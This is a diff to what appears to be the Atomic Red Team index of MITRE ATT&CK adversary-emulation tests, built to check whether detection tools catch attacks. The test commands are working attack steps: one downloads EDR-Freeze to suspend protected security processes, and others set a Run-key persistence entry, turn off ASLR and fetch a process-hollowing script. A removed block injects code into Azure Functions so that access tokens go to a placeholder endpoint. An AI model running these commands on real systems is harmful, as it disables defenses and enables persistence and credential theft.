+          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+      - description: 'The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "#{wordlist}"){exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt"
+          -outfile "#{wordlist}"
+
+          '
+      executor:
+        command: |
+          import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+          Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
+        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
+          '
+        name: powershell
  T1654:
    technique:
      type: attack-pattern
@@ -1046,7 +1046,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -1095,6 +1095,7 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
+      identifier: T1027.013
    atomic_tests: []
  T1014:
    technique:
@@ -14300,7 +14301,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14377,7 +14378,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44847,7 +44847,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44924,7 +44924,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -49100,7 +49099,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49136,6 +49135,7 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
+      identifier: T1555.006
    atomic_tests: []
  T1003.008:
    technique:
@@ -2039,7 +2039,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:58:05.840Z'
-      name: Encrypted/Encoded File
+      name: 'Obfuscated Files or Information: Encrypted/Encoded File'
      description: "Adversaries may encrypt or encode files to obfuscate strings,
        bytes, and other specific patterns to impede detection. Encrypting and/or
        encoding file content aims to conceal malicious artifacts within a file used
@@ -2088,7 +2088,48 @@ defense-evasion:
      x_mitre_data_sources:
      - 'File: File Creation'
      - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1027.013
+    atomic_tests:
+    - name: Decode Eicar File and Write to File
+      auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535
+      description: Decode the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
+          $bytes = [System.Convert]::FromBase64String($encodedString)
+          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
+
+          #write the decoded eicar string to file
+          $decodedString | Out-File T1027.013_decodedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+        name: powershell
+        elevation_required: false
+    - name: Decrypt Eicar File and Write to File
+      auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7
+      description: Decrypt the eicar value, and write it to file, for AV/EDR to try
+        to catch.
+      supported_platforms:
+      - windows
+      - macos
+      - linux
+      executor:
+        command: |-
+          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
+          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
+
+          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
+          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
+
+          #Write the decrypted eicar string to a file
+          $decryptedString | out-file T1027.013_decryptedEicar.txt
+        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+        name: powershell
+        elevation_required: false
  T1014:
    technique:
      type: attack-pattern
@@ -3922,7 +3963,7 @@ defense-evasion:
      identifier: T1036.005
    atomic_tests:
    - name: Execute a process from a directory masquerading as the current parent
-        directory.
+        directory
      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
      description: 'Create and execute a process from a directory masquerading as
        the current parent directory (`...` instead of normal `..`)
@@ -3976,6 +4017,69 @@ defense-evasion:

          '
        name: powershell
+    - name: Masquerading cmd.exe as VEDetector.exe
+      auto_generated_guid: 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
+      description: |
+        This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
+        The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
+        This technique may be used to evade detection by mimicking legitimate software names or locations.
+
+        **Expected Output:**
+        - A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
+        - SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
+        - Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
+
+        **References:**
+        - [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
+        - [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
+      supported_platforms:
+      - windows
+      input_arguments:
+        ved_path:
+          description: Directory path where VEDetector.exe will be created
+          type: Path
+          default: "$env:TEMP"
+        source_file:
+          description: Path to the source cmd.exe file
+          type: Path
+          default: "$env:SystemRoot\\System32\\cmd.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The source cmd.exe file must exist on the system.
+
+          '
+        prereq_command: 'if (Test-Path "#{source_file}") { exit 0 } else { exit 1
+          }
+
+          '
+        get_prereq_command: |
+          Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          # Copy and rename cmd.exe to VEDetector.exe
+          Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force
+
+          # Create registry run key for persistence
+          New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force
+
+          # Start the renamed process
+          Start-Process -FilePath "#{ved_path}\VEDetector.exe"
+
+          Start-Sleep -Seconds 5
+        cleanup_command: |
+          # Remove registry key
+          Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue
+
+          # Stop the process
+          Stop-Process -Name "VEDetector" -Force -ErrorAction SilentlyContinue
+
+          # Remove the file
+          Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyContinue
+
+          Write-Host "[+] Cleaned up VEDetector artifacts"
  T1600:
    technique:
      type: attack-pattern
@@ -8578,6 +8682,36 @@ defense-evasion:
        cleanup_command:
        name: bash
        elevation_required: false
+    - name: Expand CAB with expand.exe
+      auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+      description: |
+        Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+        Upon success, art-expand-source.txt is extracted next to the CAB.
+      supported_platforms:
+      - windows
+      input_arguments:
+        cab_path:
+          description: Path to the CAB to expand (created if missing)
+          type: path
+          default: "%TEMP%\\art-expand-test.cab"
+        output_dir:
+          description: Destination directory
+          type: path
+          default: "%TEMP%\\art-expand-out"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          mkdir "#{output_dir}" >nul 2>&1
+          echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+          makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+          pushd "#{output_dir}"
+          expand "#{cab_path}" -F:* .
+          popd
+        cleanup_command: |
+          del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+          del "#{cab_path}" >nul 2>&1
+          rmdir "#{output_dir}" /s /q >nul 2>&1
  T1562:
    technique:
      type: attack-pattern
@@ -23481,6 +23615,127 @@ defense-evasion:
          -Name Enabled -Value 1 -PropertyType "DWord" -Force
        name: powershell
        elevation_required: true
+    - name: Freeze PPL-protected process with EDR-Freeze
+      auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+      description: This test utilizes the tool EDR-Freeze, which leverages the native
+        Microsoft binary WerFaultSecure.exe to suspend processes protected by the
+        Protected Process Light mechanism. PPL is a Windows security feature designed
+        to safeguard critical system processes — such as those related to antivirus,
+        credential protection, and system integrity — from tampering or inspection.
+        These processes operate in a restricted environment that prevents access even
+        from administrators or debugging tools, unless the accessing tool is signed
+        and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
+        trusted by the operating system, EDR-Freeze is able to bypass these restrictions
+        and temporarily freeze PPL-protected processes for analysis or testing purposes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        processName:
+          type: string
+          default: SecurityHealthService
+          description: PPL-protected process name to target
+      executor:
+        command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
+          System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool OpenProcessToken(IntPtr
+          ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool LookupPrivilegeValue(string
+          lpSystemName, string lpName, out long lpLuid);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool AdjustTokenPrivileges(IntPtr
+          TokenHandle, bool DisableAllPrivileges,\n        ref TOKEN_PRIVILEGES NewState,
+          uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n    [StructLayout(LayoutKind.Sequential,
+          Pack = 1)]\n    public struct TOKEN_PRIVILEGES {\n        public int PrivilegeCount;\n
+          \       public long Luid;\n        public int Attributes;\n    }\n\n    public
+          const int SE_PRIVILEGE_ENABLED = 0x00000002;\n    public const uint TOKEN_ADJUST_PRIVILEGES
+          = 0x0020;\n    public const uint TOKEN_QUERY = 0x0008;\n\n    public static
+          bool EnableSeDebugPrivilege() {\n        IntPtr hToken;\n        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
+          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n            return
+          false;\n\n        long luid;\n        if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
+          out luid))\n            return false;\n\n        TOKEN_PRIVILEGES tp = new
+          TOKEN_PRIVILEGES();\n        tp.PrivilegeCount = 1;\n        tp.Luid = luid;\n
+          \       tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n        return AdjustTokenPrivileges(hToken,
+          false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n    }\n}\n\"@\n\n$result =
+          [TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n    Write-Host
+          \"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
+          {\n    Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
+          Red\n    exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
+          $#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
+          \"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n        \n#
+          Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
+          WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
+          = $wmiProcess.GetOwner()\n    Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
+          Get the folder of the current script\n$scriptFolder = Split-Path -Parent
+          $MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
+          and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
+          = Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
+          latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n    Invoke-WebRequest
+          -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
+          \   Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
+          \   $extractFolder = $scriptFolder\n    if (Test-Path $zipPath) {\n        Write-Host
+          \"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
+          Cyan\n        if (Test-Path $extractFolder) {\n            # Ensure target
+          exe not locked; attempt to stop any running instance silently\n            Get-Process
+          -Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
+          -ErrorAction SilentlyContinue\n        }\n        Add-Type -AssemblyName
+          System.IO.Compression.FileSystem 2>$null\n        # Custom extraction routine
+          (overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
+          \       $archive = $null\n        try {\n            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
+          \           foreach ($entry in $archive.Entries) {\n                if ([string]::IsNullOrWhiteSpace($entry.FullName))
+          { continue }\n                if ($entry.FullName.EndsWith('/')) { # directory
+          entry\n                    $dirPath = Join-Path $extractFolder $entry.FullName\n
+          \                   if (-not (Test-Path $dirPath)) { New-Item -ItemType
+          Directory -Path $dirPath -Force | Out-Null }\n                    continue\n
+          \               }\n                $destPath = Join-Path $extractFolder
+          $entry.FullName\n                $destDir = Split-Path $destPath -Parent\n
+          \               if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
+          -Path $destDir -Force | Out-Null }\n                if (Test-Path $destPath)
+          { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n                try
+          {\n                    # Use static extension method (PowerShell 5.1 compatible)\n
+          \                   [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
+          $destPath, $false)\n                } catch {\n                    Write-Host
+          \"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
+          \               }\n            }\n            Write-Host \"Extraction completed.\"
+          -ForegroundColor Green\n        } finally {\n            if ($archive) {
+          $archive.Dispose() }\n        }\n    }\n} catch {\n    Write-Host \"Failed
+          to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
+          15s before putting targeted process before putting it in the comma\nWrite-Host
+          \"Waiting 15s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
+          $processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
+          5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
+          in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
+          targeted  process in the comma for 15s\n# Discover the EDR-Freeze executable
+          dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
+          -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
+          |\n    Sort-Object LastWriteTime -Descending |\n    Select-Object -First
+          1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n    Write-Host \"No
+          EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
+          Red\n    exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
+          \"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
+          \"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
+          -ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
+          (\"$($process.Id) 15000\") | Out-Null"
+        cleanup_command: |-
+          Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+          Write-Output "File deleted: $edrFreezeExe"
+        name: powershell
+        elevation_required: true
+    - name: Disable ASLR Via sysctl parameters - Linux
+      auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+      description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
+        which disables Address Space Layout Randomization (ASLR) in Linux.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sysctl -w kernel.randomize_va_space=0
+
+          '
+        cleanup_command: 'sysctl -w kernel.randomize_va_space=2
+
+          '
+        name: bash
+        elevation_required: true
  T1601:
    technique:
      type: attack-pattern
@@ -23819,6 +24074,14 @@ defense-evasion:
      supported_platforms:
      - windows
      input_arguments:
+        script_download_url:
+          description: Download url for Start-Hollow.ps1
+          type: string
+          default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
+        script_path:
+          description: Path to Start-Hollow.ps1
+          type: path
+          default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
        hollow_binary_path:
          description: Path of the binary to hollow (executable that will run inside
            the sponsor)
@@ -23838,7 +24101,7 @@ defense-evasion:
          default: notepad
      executor:
        command: |
-          . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
+          . "#{script_path}"
          $ppid=Get-Process #{parent_process_name} | select -expand id
          Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
        cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -23846,6 +24109,21 @@ defense-evasion:

          '
        name: powershell
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Start-Hollow.ps1 must be installed
+
+          '
+        prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          try {
+            iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
+          } catch {
+            Write-Error $_
+            Exit 1
+          }
    - name: RunPE via VBA
      auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
      description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -23931,7 +24209,7 @@ defense-evasion:
          -program "#{hollow_binary_path}" -debug

          '
-        cleanup_command: |-
+        cleanup_command: |
          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
  T1564.009:
@@ -27759,9 +28037,9 @@ defense-evasion:
        command: |
          aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Created ***"
-          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Created ***"
-          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Deleted ***"
          aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Deleted ***"
@@ -31497,7 +31775,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -31574,223 +31852,7 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
